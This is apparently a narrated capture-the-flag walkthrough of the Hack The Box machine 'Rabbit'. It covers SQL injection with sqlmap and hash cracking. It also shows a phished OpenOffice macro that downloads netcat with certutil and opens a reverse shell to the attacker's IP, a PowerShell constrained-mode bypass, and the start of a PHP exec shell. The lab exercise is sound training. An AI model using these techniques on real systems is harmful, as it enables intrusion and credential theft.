Hello everyone, welcome to another edition of Can You Hack It? I'm your host Ben, aka Iceman, and this week we're on Hackthebox.eu again, and we're going to be going down the rabbit hole. That's right, it's finally time to do Rabbit. For those of you that are familiar with this system, you'll know that, at least for a lot of people, it was a pain. They had a lot of rabbit holes, things that were meant to kind of sidetrack you. I personally spent a ton of time on this one. I dug into things that I probably shouldn't have dug so deep in, but it was one of those things where you just kind of want to keep going until you reach some sort of conclusion. And so it resulted in taking a lot of time. But all in all, it was a great box, tons of fun, and so I'm going to try to walk through it with you guys now. I'm going to try and figure out how to include just the right amount of getting sidetracked. Keep in mind, in real life, got sidetracked a ton more than this, but it's just one of those things where you guys don't want to be watching a 12-hour video of me poking around at every single thing. So let's go ahead and get started. And so as always, we'll start out by making sure that we're connected. Sorry, I can't type today. Okay, and doing our typical create a directory to work out of. And we'll create a directory for our Nmap scans. And then we'll start up our Nmap. So we'll do nmap-t5 so that we make it aggressive, sc and sv for enumerate versions and run scripts. -v to make it verbose so that it's outputting while it's running. And we'll save what we find in nmap quick. And then 10.10.10.71 is the IP address of this machine. And so as you can see, we're getting back a bunch of results already. And there's tons of stuff. So we've got some SMTP, we've got some DNS, HTTP, HTTPS, Microsoft RPC and NetBIOS stuff, Kerberos, looks like LDAP, got a 3306, so MySQL, 8080, probably another web server. So lots of stuff to check out. And so what we can do while we're waiting for this to finish up is we can open up another tab and get some GoFuzzing started on those the stuff that we can guess safely as a web server, this 8080, this port 80, this port 443. So if we do GoFuzz, and lately I've been having some good results with just doing HRC, which is hide response codes of 404s. We could do show response code of 200 or 200s and 301s, or lots of combinations, but anyway, it's been working well like this. So we hide the stuff that just definitely doesn't exist, and we show pretty much everything else. If we get too much output, we can always change that. -R to make it recursive, the way we enter into directories and continue on. Let's do extensions of PHP and HTML for now. Show full responses. Show full responses, which will output the entire thing instead of just the particular word that matched. We'll do 50 threads instead of the typical 100 that I like to do, mainly because I'm going to try and run a few of these on the different services, and I don't want to overload that system or my system. And then word list, we'll do user share, word list, stirbuster, directory, list 2.3. I think we can probably do small. That'll speed it up a little bit. If we don't find what we're looking for, then we may have to do medium. And then 10.10.10.71 /fuzz. And so this will fuzz our port 80. I'll copy that so that we can just paste it on the next one. Ooh. So we're getting tons and tons and tons of 403s on here. So actually on this one, I'm going to do the opposite of what I just said. Or actually, I'll see if this works, which I know it's entertaining when I say I'll see if this works when I'm the one that wrote the code, but I don't remember if I made it handle multiple of the exact same flag. We'll find out. Yeah, it looks like it does. So I think I intended to make it so that you could just provide a comma-separated list, but I haven't done that yet, but it looks like this is handled correctly anyway, so that's fine. Pop open another window, paste that out. Let's get started on the secure site. And that actually has something interesting already, but I'll ignore it for a second. And finally, paste it out one more time and get going on 8080. And so that's going to see if I end up breaking something by running this many all at the same time. And so while those are running, let's pop open another tab and get some dnsrecon going, since we saw that the DNS port was open, port 53. So if we do dnsrecon, don't actually remember the options here. So dnsrecon and lowercase d for domain, which, let's go back here. So this is finished. See if it got the domain? Yeah, it did. So the domain's http.local, which it got through that OpenLDAP port. So http.local, and then we just need -n for our name server, which is 10.10.10.71, and we'll do a -a, trying to transfer on it. So it looks like the system is rabbit.http.local. Zone transfer failed. It's running Microsoft Bind 6.1.760. And looks like we've got a bunch of service records. And anybody that works with Windows Active Directory systems will recognize this. So this is probably a domain controller, and so it's got all of its LDAP records, Kerberos. So for now, none of it's super interesting, but it's something to keep aware of. That is actually something on this box that I didn't ever dig into, so maybe watching some other videos or something, there was something to be found here. There is a lot of the LDAP being open, Kerberos, RDP, or sorry, not RDP, RPC, and some of the NetBIOS stuff. So there may have been something there. I didn't ever have to dig into it, but just be aware of it. So now let's go ahead and take a look back at our scan or Nmap, just see if we see anything else that looks super interesting. So IIS 7.5, which we can look up. I believe that is 2008 probably, since this is running presumably on a server. And let's see, Windows 7 or 2008 R2. So presumably it's 2008 R2, since it looks to be running an Active Directory domain controller, and you can't run that on Windows 7. So let's take a look back at our GoFuzz results now. So it looks like we've got, I'm not sure where that 4044 showed up. We've got a redirect from on HTTP for Outlook Web Access, I believe OWA stands for. So we're probably running Outlook Web Access. You see it again here. So if we got a redirect from public to OWA, from Exchange to OWA, OWA to OWA. So we're likely running Outlook Web Access, which, let's just take a quick look. And we are. We don't have any credentials right now to even try, so I'm not going to try and brute force it or do something else to guess those. And then on our port 8080 scan, it looks like we've got quite a lot of stuff. We've got an index.html with a picture of a rabbit. And if we take a look at the source, don't see anything super interesting, so that's probably just there to be fun. Let's see what else we've got. So we've got, it looks like a Joomla site. Click on that. Taking forever to load. Okay, it looks like it loaded in the background there. And we've got a complain site. I'm going to go ahead and close out of this for right now. Now, technically, since I'm running this in recursive mode, it will eventually get through and start enumerating on this complain URL. I'm going to go ahead and just manually tell it to right now, so that we can mess around with this Joomla site while this is running in the background. And looks like there's also a PHP my admin. The reason I'm not doing this on the Joomla site is just because typically we know it's there, but we can also look in there and see. We can also see right now that we're getting a bunch of stuff back on the complaint site already. But so Joomla should have an admin URL, administrator. And the default username and password, depending on the version, is admin, which it looks like doesn't work. So what we can do is we can fire up Burp. And let's not update that right now. Start it with a temporary project. So we'll flip this over to use Burp. We'll send admin password. Go over to our Burp. It captured it. We'll send it to repeater and we'll forward it on. Minimize out of that real quick. See what comes back. So that's no good also. Disable using the proxy for Burp for right now, and we'll just work out of the repeater tab. So we could sit here and we could guess. It's likely not going to do anything for us. What we can also do is use the built-in intruder module. The problem with that, if you're using a free version, is it's slow. And so what we'll do instead is we'll try and use Hydra and see if that gets us anywhere. So let's see here. Need Hydra. Oops. Oops, did I spell it right? Hydra. And let's see what the arguments are. Okay, yeah. So lowercase l, we'll use the username admin. Capital P gets us our password file. So we'll do user share word lists rocky.txt. And we'll set port to 8080 and 10.10.10.71, and then we'll do the HTTP post form. And we'll do Joomla administrator index.php. And then we need our parameters, and so we can take those from here, paste those in, and then let's change the pass here to pass, and admin to user, and then another colon, and we need to have a message for when it fails. That way we know that it didn't succeed. Looking back at the page, it looks like it says warning, user account and password do not match. So let's just do warning. That's probably good enough, as long as it doesn't appear on the page when we're actually logged in legitimately. I think that should be all we need. Check back on this while that's running. So this is still running. It's found a bunch of stuff. This has mainly just found the Outlook web access. This also is mainly just found the Outlook web access. I'm not sure what these 400s are, but I'm going to cancel that and cancel this for now so that we're not hitting the server quite so hard. And I'll leave that one running just in case. So it looks like it found a bunch of usernames and passwords. That only generally happens when or I should say passwords for the same username. So that generally only happens when we have something wrong. What we can do is pop over to the proxy tab, add a new one, 8081, and we can have it listen on our local host and forward to 10.10.10.71.8080. And so what this one will do is allow us to see these requests that are being made, so we can see what's going wrong. Just change this to 127.0.0.1, and we'll change the port to 81. Hit enter. It got grabbed here. We don't actually want to intercept it, so we'll just turn that off. We can see it here in the HTTP history. So we're starting to get responses back now because it contained an invalid security token. So they've got some security tokens that are being used, and so our the way we're handling our requests, it's not going to work, and it's probably not worth digging into at this point. This one I didn't dig into super far because of this. Usually, especially on a system named Rabbit, if you find a Joomla site or something that has some security tokens or other things enabled, it's likely a good time once you hit, you can't guess a username and password, to move on to one of the other things that are available. See if you find something later on that can allow you to come back and log into it. So for now, we'll just back burner this. And what we'll do instead is look at the complain system. So back here, we see all kinds of stuff to check out. Looks like we've got a login page, we've got a main. Let's just see in the browser if we go to That's interesting. We notice on this example page that has nothing. It happens to have the same icon. I don't know if that actually means anything. So we've got a register here. We've got a forgot password. So if we do forgot password, we make up some username, bob at bob.net, and employee customer. You're not a valid engineer. So there may be a way to enumerate actual user accounts with this. Admin at htb.local. You're not a valid engineer. So let's go ahead and go back forward again. And so let's just register an account, see if that works. And we will send this through Burp. So for our username, please subscribe. And password, like the video. And we'll register as a customer since that's our only choice here. Address 1234 Northeast First. Mobile number 555-555-1212. And email is please subscribe at youtube.local. And so let's turn on intercept real quick. Let's register that. So we can see it's sending our username, please subscribe, our password, like the video, a U-type of customer, and a address, mode, email, and login button. So if we forward that, it looks like it takes us back to, let's turn intercept off. So it looks like that probably worked. Let's go to forgot password and see. So if we do, username was please subscribe, and our email was please subscribe at youtube.local, and we were a customer. So there's a potential issue. The database is likely storing passwords in plain text, because you'll notice that it just showed us our password. It didn't create a new password. It didn't prompt us to make a new password. It just simply said your password is this. So we could likely enumerate usernames and passwords through this form. Again, not going to do it in this video. It probably was a valid way to do it, although I'm not sure if this would end up locking you out at some point. But since you'd have to guess emails and usernames, that could be a little bit tricky. So if we go back now, actually let's try one more thing here real quick. We only had two types, employee and customer. Actually, that's fine. Let's go back to our login. And we're still sending these through Burp. Let's turn intercept back on, or actually we can leave it off and just look at the history. So if we do, please subscribe, and password was like the video. Let's try administrator first. I assume it won't let us do that. You're not an admin. We look back here at the HTTP history, go to the bottom, look at our request. So U-type was admin. So we can use this as a way to enumerate the U-types that are valid. Again, I don't know if it will come in handy for anything, but for some reason I didn't see the login on that one. It's possible I mistyped. And so okay, there we go. You type employee. It's the same thing. We weren't able to log in with employee either. Let's see if we register. Let's turn intercept on now. Let's see if we can modify it to make us an admin. So if we do Iceman, password, type customer, 123 Northeast First, 555-555-1212, Iceman at iceman.net. And so let's replace customer with admin. Let's forward that on. Now, it didn't take us to that page it did before saying that we registered correctly, so let's see, Iceman, password, user type of admin, log in, and it doesn't work, so that's fine. Let's go ahead and log in with what we know does work. Please subscribe, like the video, and type is customer, So now we're into their complaint management system. So now we can see what we can do in here. It looks like we've got some plans for a TV service, a window to make a complaint, window to view complaint details, which happens to be empty. If we look up here at the URL, it looks like MOD says customer, view, comp details, complaint details, I assume. We could try making this admin. And so now with the now we have the admin view of it, so we can actually see everything. I assume we can probably make this employee also, maybe. Okay, that doesn't work. Admin does. So it looks like we're able to change fields in the database, I assume. So it's possible that we can do SQL injection here. Let's look and see if we saw anything else interesting when we were scanning complain. So we've got images directory, login, register, feedback. Let's see where feedback goes. Oh, we still got burp intercept on. Oh no, yeah. So it just says feedback ... Not super helpful. View reports. So it looks like we've got open complaint details, access to some window, closed complaints. So it looks like closed complaints are there, open complaints, complaints that are being worked on, and I assume complaints that have been assigned to somebody. Employee details, so these are probably the employees working for this company. What else do we got in here? We've got a database directory, and channels I assume is just the TV channels. Let's kill this for now too. So database, looks like we actually have a SQL file here, so let's save this. And that's going to save in the default location, so we cat, or let's vim downloads complain. So this looks like the SQL script for creating the complaints database. Looks like there's a table of complaints, probably nothing interesting in there, a table of customers, and so it looks like we have customer names and passwords, a table for engineers, and we have engineers' names and passwords, and a table for plans, table for suppliers, supplier names and passwords. So this would be interesting other than, as of right now, it looks like all we have to do to get access as an administrator is to simply change our view to admin. Although it does change back when we click these links, which is fine. So where was our... Okay, so back in our report view. So what we can do is see if we can modify any of these parameters to allow us to do a SQL injection attack. So if we do like or 1 = 1, it looks like it clears it out, but it doesn't necessarily. We would expect it, although on that word it's going to be maybe it's a little different, but we would expect it to show all records if we did that, if they're filtering on that field. View, let's see. Interesting. So on this last one, we do get a SQL syntax error because of our or 1 = 1 that we added in. And so what we can try and do here then is use sqlmap to see if it can find the injection and allow us to enumerate the database. So let's pop open our window here, and we'll do sqlmap-u. sqlmap. I think it's -u. Yeah, for URL. Okay, so sqlmap-u, and we'll take the URL here. Not sure if it needs HTTPS, but we'll throw our HTTP. Throw it on there. Oh, apparently I copied it with it. So we've got that, and then we'll just do DBS, which technically Technically, we could probably guess that it's MySQL based on the fact that we saw 3306 open, but just in case, that could be a rabbit hole, could be related to something else. We do need to paste in a cookie since we're logged in. So I think if we take the cookie from any of these pages where we were messing around, not sure which one of these cookies actually matters, probably the PHP session ID, but we've got them all, so we'll take them all. And that should be sufficient. I got to redirect to a login, so I don't think our cookie worked. It could be that I'm using the wrong type of quotes. Nope, still got a redirection. See what happens if we take out everything other than this. PHP session ID. So let's make sure that we still have a valid session. Let's actually capture it. Our URL in quotes too. I don't think that matters, but just to prevent any issues. Oh, that's interesting. So I told it not to follow the redirect, and it seemed to work anyway. So, oh no. Let's see. So let's clear out the existing files that sqlmap saves, because I think what we're seeing here is just, I'm not sure why that's not showing up. What we're seeing here is saved results, because sqlmap does save its progress. And so now, let's see what happens if we run this. So it gets a redirect, tell it not to follow it. Actually, do we still have, yeah, we still have our forwarding proxy open, so we can actually send this through the forwarding proxy if things don't seem to be working, which will allow us to actually view what sqlmap's doing. And so right now what it's doing is it's testing to see if the various parameters like mod, view, ID are injectable. The fact that it's telling me that ID doesn't appear to be injectable makes me think that it's probably not working, so we'll probably need to cancel it and send it through Burp just to see what's going on. The reason I say that is because when we manually did it, we got a SQL error back, which typically suggested it is injectable. Yeah, so let's send it to 27.0.0.1.8081, which will forward it on to the actual web server. So if we look at our history here, yeah, we're getting 302s, which are redirecting us to that login page. So for some reason we're still failing. Oh, so instead of ID being customer maybe, although ID shouldn't matter. Let's see, let's make it engineer instead. Still the same thing. Oops. So if we look back here, we're still getting redirects. So let's just try this again. Let's see. Let's try taking this complete cookie again. The rule of videos, anything that can go wrong will go wrong. Okay, so it looks like it's working this time with the complete cookie. Although actually, I'm going to quit out of that one more time because we don't really care about grabbing the banner. Let's just enumerate the database. And this can sometimes take a while, so I might have to use the magic of editing so that you don't have to sit through the whole painful process. But while it's doing it right now, let's take a look just so you can see. I'll actually take it so that we're not sending through this proxy later also. So we're getting 500 errors back right now. It looks like it's messing around with the mod parameter. And if we look at what it is, so it's calling a database function. It's calling select, or it looks like it's terminating after admin, and then it's adding a new statement here. It's doing a select, and then it's giving specific characters ordered together. So this does all kinds of crazy stuff to try and tell if there's a SQL injection available. It'll do time-based stuff where it intentionally sets delays, selects specific characters. That's how it can actually enumerate what the names of databases, tables, fields, everything is. Anyway, if you're interested in it, blind SQL injection is incredibly, well, at least for me, incredibly interesting topic, but we don't have the time in this video now to talk about it, especially given that we're already running behind where I want to be time-wise. So I'm going to go ahead and pause this video once we're done enumerating it. So it looks like it enumerated that it's MySQL, which is fine. We'll skip the other ones. We'll do all tests for MySQL. I'll pause here, bring it back once this is done running. That way we're not making the video longer, just watching the terminal scroll by. Okay, and so as you can see, it's finished up now. It found that ID is indeed injectable or vulnerable to SQL injection, and it actually gives you an example of what it used as its payload. And then it went ahead and it enumerated the databases that are available on the system. And so we can see we've got a complain database information schema, which is a standard one, Joomla, MySQL performance schema, which is also a standard one, secret, and sys. So let's take a look at secret first, because the name makes you wonder if there's something that something in there that's worth looking at. And so let's see what's in it. So if we pull up our existing command, and I think we can actually just leave this the same, and we'll add a -d, specify the database of secret, and then let's look at the tables. So this should be fast enough. I don't need to pause it. Once it's got all of its stuff figured out and it knows how to perform its injection, it's usually faster. As I say that, it's taking forever. Oh, I should change that also, because right now you can see we're still going through the Burp proxy, which actually I'm going to cancel out of. We can leave the proxy running, but let's just change this so we're going straight to the server. This seems to actually be taking longer than it should. And that appears to be why. Yeah, that looks like my VPN connection had dropped. So we can put something else on there. Oh, interesting. Our tunnel adapter is not even up. We have a network connection. DNS resolution is working. It's possible it's the Hackthebox network. Tunnel adapter is back up now. Let's see if this plays a little nicer now. There we go. Just one of those days. So here in a second it should pop back with, oh, you know what? It's trying to figure out what's injectable again. It should have already known. I'll remove this DBS flag at the front. See if that's why. Oh, it's because I changed the URL. So let's go ahead and go back through our Burp proxy, because it saves its results in a folder underneath the URL. I probably could have just renamed the folder, but for now, so it looks like we have a table called users. Let's try that. So root dot sqlmap output 127. Let's copy it just in case I break something. Output 10.10.10.71. Let's see if it works the way I expect it to now. Nope. Okay. Well, not worth wasting time in the video for. So let's dump the table then. T users dump. Let's pop open Sublime text here so that we can kind of make a little table of our results. Do you want to store? Sure. And we can go ahead and do a dictionary attack on them. We'll do custom dictionary users share. Word lists rockyu.text. This should be pretty fast. What we can also do, no, we don't want to do suffixes, is we can also paste these into crackstation and see if any of them are known, since these look like MD5s. But this should be pretty fast. So there's our starting ones with the values we were able to crack. So if we paste those into here, so we've got Duma, Popcorn, Agnes, Mobius, Santiago, Ariel, Pussycat Dolls, and Malik Barcelona. And so let's see if we can find the rest of these on crackstation. And I'm not a robot. Square with vehicles. And so it looks like it found the second one, which is Kane, Dora Day, Bandita, and Raziel's, R-A-Z-I-E-L, is Kelsey Loves Berry. And the last one, let's see, is Dimitri. That's Shauna Maloney. Okay. And so let's go back and take a peek at one of our other databases. Let's look at the Joomla database, I guess. The other ones didn't look super interesting, but Joomla. And we'll see, there should be a users table in there somewhere. What did I do wrong? Database, Joomla. Oh, tables. So what we can do is get the users table and then dump the users table and hopefully find the username and password. So it looks like it's this right here. So let's just dump it. We could have looked at the columns first, but we can see them here anyway. ID, int name, username, email, password. And it looks like there's admin at htb.local. That was actually the only user I saw signed. And here's his password hash. Because of how long this video is already, I'm going to skip the part where we would try and crack this with hashcat. So the $2y, $10. It's I believe a bcrypt password hash. They're super slow to crack. And believe me when I tell you I tried, and it doesn't lead anywhere. So I'm going to go ahead and cut that out of this video just because I'm trying to keep the duration somewhat reasonable, which is difficult on the more complicated boxes like this. But so just keep in mind that something that I did do originally is I tried to see if I could crack this password, eventually gave up on it, moved on to some of the other things like the the Outlook Web Access, which is what we're going to take a peek at next. And so the reason we're going after the Outlook Web Access and we're skipping over trying it on Joomla is we obviously just dumped the Joomla database. There's only that one user, so using these credentials there just doesn't make sense. And so we can try by, let's see, Joomla, popcorn. Never remember. I don't care that there's an exception. Okay, so that login failed. Magnus. What we need to find here is just one username that works. Looks like Magnus's works. So we can enumerate the rest of these by sending an email. Well, we can't verify that the password works, but we can verify that they have a valid email address. So let's do that real quick before we look at these existing emails in here. So we send it to duma@htb.local. Oops. We're already on Magnus, so he obviously has one. Mobius at htb.local. Ariel at htb.local. Leak at htb.local. Kane at htb.local. Raziel at htb.local. And Dimitri at htb.local. Subject test. And we're going to request a delivery receipt. And so if delivery receipts are supported, we should get back receipts for mailboxes that were valid. Even without delivery receipts, we should get failure messages for the ones that weren't valid, but we'll just do it this way and see what happens. And while that's going, we'll see what we have in here. So updated list of software. There's been a change to allow the software help desk move forward with deploying OpenOffice to everybody. So we assume this is a clue because otherwise it wouldn't be in here. So they're running OpenOffice on all the machines. Security team is deployed Windows Defender in PowerShell constrained mode within the organization. Okay, so they're running PowerShell constrained mode, which means a lot of the modules in PowerShell won't be available. So some of the delivery methods for certain things may not work. It's a good thing to keep in mind. And then the final one is asking us to please send our TPS reports to management ASAP. And that's coming from the administrator. And it's going to Kane, Ariel, and Magnus. Looks like administrator's email address is administrator@htb.local. And it sounds like we just got some messages back. So Ariel, Raziel, and Kane are valid. Everybody else appears to not be valid, as we can see here. So we've got our failed recipients group, and then we got our delivery receipts. And so either way would have worked to enumerate. If we didn't ask for a receipt, we could have just assumed that these are the ones that don't work and the other ones are the ones that do work. So the next thing that I did was notice that this asking us to send the TPS reports to management ASAP is a clue that we probably need to send something to a mailbox. And this is actually one of the more unique things I've seen on Hack the Box, where we're depending on a, quote, human interaction in order to get our access. So what we can do is try and create a payload for OpenOffice. And we can start out with metasploit. I don't think metasploit will work, and I'll show you why if it fails. But essentially, I think Metasploit's macro creator heavily uses PowerShell, and so if PowerShell's in PowerShell constrained mode, then it should theoretically fail. Search for OpenOffice. I think it's, yeah. Open this up wider so we don't get the screwy formatting. So we'll use, and we'll set the payload to there's meterpreter reverse TCP, show options, set body testing, set SRV host 10, 10, 14, 15, set L host 10, 10, 14, 15. Everything else on here should be good. Exploit creates a document for us. So back in here, let's copy that document, CP. And then let's attempt to send it. So we need to figure out who to send it to. So we do new. Let's send it to administrator@htb.local. Probably Raziel. And so the reason I think it's probably Raziel or administrator is he's the only valid email account that isn't in this to list. because these guys are being asked to send the TPS reports, so they're probably not the administrator or the management. Otherwise, they wouldn't be getting this. So we'll just send it to these two for now. TPS report. Here is that TPS report you asked for. And who am I? I'm Magnus. I don't think any of this is actually necessary, but maybe they made it so that you needed to social engineer them by convincing them that it's the TPS report and not just sending them some blank thing called, well, whatever this thing's called. MSF ODT. So we attach that. And what we're going to ask for is both a delivery and a read receipt. Okay, hit send. So if we look back here in our metasploit, we should be able to see that, yes, it's got a reverse handler running. And so if this works, we should see a session start. Now, some people were confused by this not happening immediately. Best I could tell, there's a script that's checking the emails every 4 minutes. And so depending on what time you sent it at, like I think we're about a minute away from it being executed, that script, I believe, copies the payload, and then at some point something executes payloads in a directory is what I've gleaned from the way that this operates. It's always about 4 minutes after I get a read receipt back, and then a minute or so after that we generally see something happen. And so we've got our delivery, but we don't have our read receipt yet. I'm going to go ahead and actually, yeah, I'm going to go ahead and pause this, and then I'll unpause it once we get the read receipt. If we get the read receipt, if we don't, I'll unpause it and we'll move on. And so it still hasn't come back yet. I actually noticed that it gave the delivery at 3:21, so it's probably going to be until 3:24 before it'll actually return. Since I know it's not going to work, sorry to ruin the surprise there, I'm actually going to move on, and we'll start building our own payload that doesn't rely on PowerShell and see what happens with that. It also will allow us to test some things locally. So what I'm going to do is switch over. Right as I did that, it sounds like it came in. So our message was deleted without being read, but it confirms that Raziel is the one that's checking his mailbox. The reason it was deleted without being read is because they're using a script, and so they're not actually opening it up. They're presumably interacting with it through some sort of API. And so what we'll do instead here is we will pop over magically to my Windows system, where we have OpenOffice, and we will use the magic of Dropbox to open up this payload and make some modifications to it. So you see the macro ran right there. So we edit the macro, go to MSF, ODOT standard module 1, and so this is the standard metasploit code, and it's running PowerShell, and it's trying to download from our local server. So what it's doing is it's doing a staged execution. So we're going to wipe all that out because it's not going to work. At least I can't get it to work. And let's prepare to build a payload that should work. And so how we can do that is we can call command.exe, and we're going to need to download a payload from our local machine to this Windows machine that's netcat. And so what we'll do is try and download a known good version of netcat, since we don't know if netcat's on here, but it likely isn't because Windows doesn't come with netcat and almost nobody puts it on there. So we'll download a netcat instance, and then we'll run it and tie it to command.exe to get us kind of a rudimentary reverse shell. So there's a couple ways to download in Windows, and one of them is using certutil. Or there's more than a couple ways. There's PowerShell also. Certutil is my preferred one. There's also, I don't actually remember the name of it all of a sudden, pulling a blank. Anyway, there's other utilities which can be used to download, but for now we'll use certutil. And so if we do, let's see if I can actually remember it, certutil.exe URL cache, I think, split. And you can actually look this stuff up. You can look up ways to download files using inbuilt Windows utilities. Actually, let's test this out locally first. That's one of the things I've told people about in the past is when you're on, if you have a VM that you can set up and use as your target, it helps out a lot. So you can make sure things are working locally first, and then you can deploy them, especially when you have these long waits for automated tasks to happen. So it's 192.168.1.168, I think. Yeah. our Linux machine, slash payload.exe. We could call it anything. We could leave it in NC. It's not like payload sounds any less suspicious. Home drive. And so this is the path where we're going to save it to. The reason I'm not using things like CD is the drive letters. We don't know what they are, but luckily Windows has some ways we can cheat on that. Home path. And so that should do the home drive probably c:/users / the username. Payload.exe, and that way we can put it in a spot that we know we can write in because it's the user's home directory, so you should be able to write there. Not the most inconspicuous place, but we'll call it payload.exe, and then we need to execute it. So we do an and home drive %, home path, payload.exe, and then 192.168.1.168. Is that really it? That sounds... yeah. Okay, 1.168. And then port 443. The only reason we're doing 443 is just because if it's outbound, it may be easier if there's a firewall on, although in Windows a lot of the time the default firewall stuff is tied to applications and not to ports. And then we're calling it with -e and cmd.exe, which will give us a command shell over that netcat instance. So if we save that, close it, close the document, go back to our Kali machine. We need to do a couple things to prep for this. We need to run a web server, so Python simple HTTP server port 80, and we need to start a netcat listener, LVMP 443. So we're listening, and we have our web server running. So if we go back to our Windows machine, we execute this. Didn't look too promising because it closed too fast. We did deliver the payload. Oh no, we didn't. It's not found. Oh, sorry. We need to copy netcat first, which is on Kali by default. So we do cp user share Windows. Yeah, I thought user share Windows binaries. Yeah, and nc.exe, payload.exe. So this might work better when the executable is actually there. So that looks better. It's stuck open. So it delivered it, and we've got a command prompt. And we're running a SAM, which is the account that I have on that VM. And so it looks like we're good to go. We can restart our listener. Close this out. Oh, actually, I need to quit out of that again. Restart our listener. So we're going to want to make a change to this macro so that we're actually going to the real server, of course. Or sorry, going to our other IP address, 10.10.14.15. And 10.10.14.15. So we save that. We close. Go back to Kali, open our web, new, to Raziel, TPS report. Is that TPS report you asked for? Magnus. And we just need to attach our document. Get it done fast enough. I think I actually just missed the window. We'll ask for a read receipt so that we know when it actually gets read, and we'll send it. And we're still listening, so that's good. We've got our Python web server listening, so once that file's actually ran, we should be good to go. I'm not going to pause it this time, although I may edit the video a little bit to remove the waiting, but that way you can actually see when stuff's actually, I don't know about that, I was going to say when stuff's connected, but since we have this window open right now, by the time I get that receipt, we'll see what happens. Okay, and so I just got the not read report. So that means that it's actually been copied by the script. We don't see that it's been executed yet. And so it looks like it's downloaded our payload now, so we have a remote shell. So who am I? We're Raziel. And so next we need to get the user flag, and then we'll see if we can get privilege escalation and wrap this up before this video gets too long. For now, I'm actually going to pause this and I will be back later to finish it up. That's what I get for being too lazy and trying to do this at the last moment, and now it's about 3 in the morning, so I'll finish it up early in the morning and hopefully get it edited and posted up in time. Hey everybody, welcome back. So let's see if we can finish this thing off. So if you, well, of course you remember because I edited out the gap, but anyways, we're on the system now as, I believe, Raziel. Yeah. So we're on the system as Raziel. Now we just need to figure out what his flag is, and then see if we can get privesk up to a higher privileged account to get the admin flag, or root flag. So let's see if we can get that user flag real quick. We should just need to switch into the user's home directory. Sorry. Raziel. You can see our payload that we sent down, which is just netcat here in the user's home directory, which is where we ended up writing it to. And so if we go to desktop, it should be in here. You can see that it is. Let's see if this is going to work. Since they have PowerShell constrained language mode turned on, it may not work initially. Actually, I kind of hope it doesn't, because I can show you a way that we can get around that. I don't know if I need to give full path here or not. I think I do. And so actually it worked in this case because we're not using any modules that aren't in the constrained language mode. If we were to use some that were in constrained language mode, then to get around that, all you would need to do is add is in our PowerShell command here. We don't have up and down. So in our PowerShell command here, you would just add a dash version space 2, and that should be enough to get around it because it didn't exist in version 2. And so if you use version 2, it won't have constrained language mode in it. There's also some other tricks like running an older version of PowerShell. So in system root syswow64 Windows PowerShell /v1.0 /PowerShell. That PowerShell should also work, I believe, even with constrained language mode turned on. But anyway, let's see here. So now all we're going to need to do is figure out how to get privesk. And so to start out on a Windows box, I usually like to just run system info, get the information about which version we're running, see if it looks like it's been patched. It seemed like a lot of people on the forums seemed to get kind of stuck on the privesk. I happened to notice a path that worked fairly early on, which is the one I'm going to show you. So I don't know if people just weren't paying close attention, or possibly they just aren't as familiar with Windows. So this is server 2008 R2, which is what we thought. Looks like it's got a decent amount of hotfixes installed, so likely any sort of exploit may not work, although we could see when the last date that update was installed was. But the next thing I typically like to do is just do a quick task list. And that'll show you what's running. And now, actually, if you throw a V in there for verbose, you get a lot more information. So pretty much anything running as Raziel, we're not super interested in because even if we were able to exploit this running process, we wouldn't be able to get a privesk from it because we would just end up being ourselves. MSFT, FD, this meta is actually left over from me, I believe. This box, I'm guessing, hasn't been rebooted in a while. You can see my payload that we're using to get this shell right now. There's a command prompt running, which is, or cmd.exe running. Oh, that may be tied to the meta process, because anytime you see NA here, it means we can't retrieve the information for which user is running this process. Generally, that means it's admin, or most of the time it's system. I think the only thing that'll actually show us system is the Explorer process, which will be all the way at the top. So what we're looking for here is anything that looks interesting. W3WP, and that's the IIS worker process. So IIS is probably running with some privileges. Looks like we've got a bunch of Exchange stuff running on here. HTTPD is running as something elevated probably, as is MySQL. So that's interesting to see. HTTPD is typically Apache, which you don't see often on Windows, especially when it's combined with IIS. So MySQL, Apache, which has multiple instances running, that may be something to go after. Some Active Directory stuff, and the system idle process is running a system. So now let's see if we can find any credentials. HKey local machine, software. What we're going to look at is the WinLogin, which is stored login credentials for auto login. So that's interesting. This has actually changed since the last time I did this box. Previously, there was actually some credentials for Raziel in here. They weren't really usable for anything. I suppose you could try and turn on remote desktop or something, and then log in as him since you have his username and his password, and maybe do some interesting stuff with Exchange or something else on the box. But it looks like, unless I misremember the command, which I think this is the right one because other pieces are showing properly, looks like that's no longer working, which is the way it goes sometimes, especially when there's been a long amount of time between doing these boxes and doing these videos, is things will get changed in the meantime. So do net user Raziel. Let's see which permissions Raziel has. So we can see that he's got discovery management, mailbox import export. This is actually a really weird permission to have that you don't see a lot. And I'm curious if this one was designed to just be a rabbit hole. I spent a ton of time trying to get Exchange commands, Exchange's PowerShell module, running in this environment so that I could try and export mail from all the accounts. I thought maybe there was an email in somebody like Raziel's account that had some credentials we needed. And at least in my case, I just ran into walls and eventually gave up on that. That's when I started looking closer at what's running on the system and what I have permissions to do, and a much easier path ended up coming around. So let's see. Let's get a tool over here that we can use to check what we have permissions to access. So I think I keep that in Dropbox, tools, accesschk. Windows maybe? No. Well, I know somewhere where it should be. Dropbox. My original Rabbit folder. CHK.exe. By the way, you can just download this, which perhaps is what I should just do. Oh. We'll just extract both versions of these. So now we should have them in here. Yeah. And so if we go back to our shell, we can just do a cert-util rel cache split 15. about that. So now if we run, let's see. Oh, we need to accept the EULA first. Okay, so now we'll do W for show only objects with write access. We'll do S to recurse, and we'll do U to suppress errors. I thought I normally do it -Q, but I don't see it as an option in here. Maybe that's the one to accept the EULA. Anyway, we'll just accesschk.exe, QWSU, users. Oops. We'll just do it in the root. And so right off the bat, we're noticing a ton of stuff in WAMP64. Actually, hopefully we don't break our shell here. I think I broke my shell several times doing this previously, in which case we'll have to get it back. Just the raw amount of output seems to break. So we see a ton of stuff in WAMP64 www. We see the Joomla folder. So we saw earlier that the HTTPD service was likely running with elevated privileges. And we see here that we can write whatever we want into the folders that it's serving out of. And so that's what led me early on, well, after the long chase through Exchangeland, led me to think that this is probably the easiest way in, because we've got write access to a folder where we have a process that's serving files that we can control. And that process is likely running with elevated privileges. So all we need to do is create something that will give us a shell. We could use netcat, and that might work the same netcat that we already have. In fact, I suppose we could try that. So this will be a little detour because I haven't actually tried this previously. It's possible it'll fail miserably. But if it does, we will learn something from it. So the first thing we need to do is make our PHP page. So if we go to vim shell.php, so we'll do a normal PHP open tag, an exec, cinc users Raziel payload.exe, and then our parameters for payload.exe would be our IP address 10.10.14.15, a port which will be 444, and then cmd.exe. That should be good. Actually, let me cat it real quick, make sure. 